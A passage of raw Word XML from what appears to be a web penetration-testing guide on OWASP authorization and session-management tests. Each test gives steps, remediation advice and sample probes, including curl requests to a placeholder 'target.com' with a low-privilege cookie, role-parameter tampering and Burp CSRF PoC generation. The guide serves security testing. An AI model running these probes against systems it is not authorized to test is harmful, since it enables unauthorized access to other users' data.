      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable allow_url_include and similar dangerous interpreter settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHZ-002  —  Testing for Bypassing Authorization Schema</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(Autorize extension), OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether a resource can be accessed without proper authorization, or whether access-control lists (ACLs) can be bypassed via forced browsing.</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As a low-privileged (or unauthenticated) user, attempt to directly request URLs known to be restricted to higher-privileged roles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Burp's Autorize extension to automatically replay every authenticated request under a lower-privileged session and flag unexpected 200 OK responses.</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curl -H 'Cookie: session=&lt;low-priv-session&gt;' https://target.com/admin/adduser.jsp</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Perform authorization checks server-side on every request to every sensitive resource — never rely on hiding links/menu items in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Adopt a default-deny authorization model, explicitly allow-listing what each role may access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHZ-003  —  Testing for Privilege Escalation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(Autorize), OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether a user can manipulate hidden parameters or request values to elevate their own privilege level (horizontal or vertical escalation).</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Identify parameters that convey role/group/privilege (e.g., groupid, role, isAdmin) within requests or hidden form fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify these values (e.g., groupid=2 to groupid=1, or role=user to role=admin) and resend the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Observe whether the application grants the elevated privilege reflected in the modified parameter.</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(Burp Repeater) modify request body/param: groupid=2 -&gt; groupid=1, resend and inspect response</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Never trust client-supplied role/privilege parameters; derive privilege exclusively from the server-side session state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log and alert on repeated attempts to modify privilege-related parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHZ-004  —  Testing for Insecure Direct Object References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(Autorize), OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether an authenticated user can access another user's data or objects simply by changing a reference ID in the request (IDOR).</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Identify requests that reference objects by a predictable identifier (e.g., ?invoice=123, /users/45/profile).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">As User A, note their own object IDs; as User A's session, attempt to request User B's known or guessed object ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm whether the response returns User B's data without any authorization check.</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curl -H 'Cookie: session=&lt;userA-session&gt;' 'https://target.com/invoice?id=456'  (where 456 belongs to userB)</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Enforce an object-level authorization check on every access, verifying the requesting user actually owns or is entitled to the referenced object.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prefer indirect, non-sequential (UUID) object references where feasible, as a defense-in-depth measure (not a substitute for authorization checks).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId19"/>
          <w:footerReference w:type="default" r:id="rId20"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Session Management Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Session management testing examines how the application creates, protects, and destroys session state — including cookie attributes, session fixation, CSRF, logout behavior, and session timeout — since a broken session mechanism can nullify otherwise-strong authentication.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">SESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-SESS-001 – OTG-SESS-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-SESS-001  —  Testing for Bypassing Session Management Schema</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ForceSSL, OWASP ZAP, CookieDigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyze session identifiers for predictability and evaluate transport security to determine if sessions can be predicted, brute-forced, or intercepted.</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Collect multiple session identifiers issued across separate login events and analyze them for detectable patterns (sequential, time-based, weakly randomized).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the session cookie is only ever transmitted over HTTPS (check the Secure flag and observe actual traffic).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to reuse an old/expired session ID after logout.</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(Burp Sequencer) capture 100+ session tokens and run the built-in randomness analysis</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Generate session identifiers using a cryptographically secure random number generator with sufficient length/entropy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the Secure flag so the cookie is only ever sent over HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fully invalidate session identifiers server-side upon logout or expiry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-SESS-002  —  Testing for Cookies Attributes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Verify session and sensitive cookies are protected with HttpOnly and Secure flags, correct SameSite policy, and a sensible expiration.</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Inspect the Set-Cookie header for every session/authentication cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm HttpOnly (prevents JS/XSS access), Secure (HTTPS-only), and SameSite (CSRF mitigation) are all set appropriately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the cookie's expiration — session cookies handling sensitive data should not persist indefinitely.</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curl -I https://target.com/login  (POST credentials, inspect Set-Cookie header in response)</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Set HttpOnly, Secure, and SameSite=Lax or Strict on all session/authentication cookies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid storing sensitive data directly in cookie values; use an opaque session identifier only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-SESS-003  —  Testing for Session Fixation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the application issues a new session identifier upon successful authentication, or whether a pre-authentication session ID remains valid and is reused post-login (allowing fixation attacks).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Capture the session ID issued before login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in successfully and check whether the session ID changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If unchanged, attempt to use the pre-login session ID (as if fixed onto a victim) to access the now-authenticated session.</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(Burp) note session cookie value pre-login; complete login; compare session cookie value post-login</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Always regenerate/rotate the session identifier immediately upon successful authentication and upon any privilege level change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-SESS-004  —  Testing for Exposed Session Variables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session tokens are exposed via insecure transport, caching, logging, or GET-parameter transmission (which leaks into browser history, proxy logs, and Referer headers).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Check whether the session token is ever transmitted as a URL/GET parameter rather than a cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review whether session tokens appear in server access logs or the Referer header when navigating to third-party resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm session tokens are encrypted/protected appropriately in transit and at rest server-side.</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curl -I https://target.com/dashboard?sessionid=abc123  (flag if the app accepts session state via URL)</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Transmit session identifiers only via HttpOnly, Secure cookies — never via URL parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Strip Referer information when navigating to external domains (Referrer-Policy header).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-SESS-005  —  Testing for Cross Site Request Forgery</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(CSRF PoC generator), OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether state-changing requests can be executed on behalf of an authenticated user without their consent, via a forged cross-site request.</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Identify state-changing requests (fund transfer, password change, profile update) and check for a unique, unpredictable anti-CSRF token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If no token is present or it is not validated server-side, generate a proof-of-concept HTML page that auto-submits the forged request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the PoC and, in a authenticated browser session, verify the forged action executes.</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(Burp) right-click the target request &gt; Engagement tools &gt; Generate CSRF PoC</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Include a unique, unpredictable, server-validated anti-CSRF token on every state-changing request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set SameSite=Strict or Lax on session cookies as a complementary defense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-verify sensitive actions with re-authentication or step-up verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-SESS-006  —  Testing for Logout Functionality</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Confirm that logging out fully and immediately invalidates the session on both the client and server side (including any SSO context).</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Log in, capture the session token, then log out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to reuse the captured session token in a new request after logout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If SSO is in use, verify logout propagates to the identity provider and all connected relying-party applications.</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(Burp Repeater) resend a previously-captured authenticated request using the session cookie captured before logout</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Invalidate the session server-side immediately on logout, not merely by clearing the client-side cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure SSO logout is properly propagated (single logout / back-channel logout) across all federated applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
